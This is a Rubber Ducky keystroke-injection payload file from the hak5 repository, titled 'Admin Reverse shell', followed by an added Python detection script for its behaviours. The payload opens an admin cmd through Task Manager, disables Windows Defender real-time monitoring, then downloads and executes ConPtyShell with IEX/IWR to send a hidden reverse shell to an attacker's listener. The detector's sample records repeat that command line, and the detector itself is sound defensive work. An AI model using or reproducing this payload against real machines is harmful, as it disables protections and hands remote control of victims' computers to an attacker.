GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/remote_access/NSHELL/Payload.txt.txt
REM Title: Admin Reverse shell
REM Author: Naitik Dharmendra Joshi
REM Description: Opens cmd with admin privileges and starts a reverse shell in a hidden PowerShell window
REM Target: Windows 10 (CMD, Powershell)
REM Version: 1.0
REM Category: General

REM Change the Following Details.
REM [LISTENER_IP_ADDRESS] IP Address of the Attacker System.
REM [PORT] The Port on the target system you want Netcat to listen on.

DELAY 300
GUI r
DELAY 20
REM --> Opens Task Manager
STRING taskmgr
DELAY 150
ALT f
n
DELAY 50
REM --> Starts CMD
STRING cmd
TAB
REM --> Turn On Admin Privileges
SPACE
REM --> Run
ENTER
DELAY 20

REM --> Kills TaskManager, Executes PowerShell Commands (Hidden), Disables Windows Defender and Executes a Reverse Shell
STRING taskkill /IM taskmgr.exe && powershell -WindowStyle hidden Set-MpPreference -DisableRealtimeMonitoring $true; IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell [LISTENER_IP_ADDRESS] [PORT]");
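
A detection-side view of the behaviours the REM comments above describe, as an added example that is not part of the hak5 repository file: it scores process-creation records for the Defender real-time-monitoring change, the hidden PowerShell window, the download-and-execute cradle, the ConPtyShell invocation, and a shell whose parent is Task Manager. Record keys follow Sysmon Event ID 1 field names; the rule names, the severity split and the sample records are assumptions constructed for illustration.

```python
import re

# Behaviours visible in the payload's final STRING line, matched
# case-insensitively against a process command line.
RULES = {
    "defender_realtime_disabled": re.compile(
        r"set-mppreference\b.*-disablerealtimemonitoring\s+(\$true|1)\b", re.I),
    "hidden_powershell_window": re.compile(
        r"powershell(\.exe)?\b.*-w(indowstyle)?\s+h(idden)?\b", re.I),
    # Download cradle: Invoke-Expression and Invoke-WebRequest together, any order.
    "download_and_execute": re.compile(
        r"(?=.*\b(iex|invoke-expression)\b)(?=.*\b(iwr|invoke-webrequest)\b)", re.I),
    "conptyshell_invocation": re.compile(r"\binvoke-conptyshell\b", re.I),
}

def score_event(event):
    """Return the sorted rule names hit by one process-creation record."""
    cmdline = event.get("CommandLine", "")
    hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
    # Assumption: a shell started from Task Manager's "Run new task" dialog
    # is logged with Taskmgr.exe as its parent image.
    if (event.get("ParentImage", "").lower().endswith("\\taskmgr.exe")
            and event.get("Image", "").lower().endswith(("\\cmd.exe", "\\powershell.exe"))):
        hits.append("shell_spawned_by_task_manager")
    return sorted(hits)

def triage(events):
    """Return (index, severity, hits) for every record with at least one hit."""
    alerts = []
    for i, event in enumerate(events):
        hits = score_event(event)
        if hits:
            # Tamper with Defender plus a download cradle in one process: high.
            high = {"defender_realtime_disabled", "download_and_execute"} <= set(hits)
            alerts.append((i, "high" if high else "medium", hits))
    return alerts

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
# Constructed sample records (not real logs); 192.0.2.10 and example.invalid are placeholders.
SAMPLE = [
    {"Image": CMD, "ParentImage": r"C:\Windows\System32\Taskmgr.exe", "CommandLine": "cmd"},
    {"Image": PS, "ParentImage": CMD, "CommandLine": "powershell -WindowStyle hidden Set-MpPreference -DisableRealtimeMonitoring $true; IEX(IWR https://example.invalid/script.ps1 -UseBasicParsing); Invoke-ConPtyShell 192.0.2.10 4444"},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell Get-MpPreference"},
    {"Image": PS, "ParentImage": CMD, "CommandLine": "powershell -Command Invoke-WebRequest https://example.com/f.zip -OutFile f.zip"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE):
        print(alert)
```

The Task Manager parent rule on its own is low-signal, since administrators start shells that way too, which is why it only rates "medium" unless it coincides with the other behaviours.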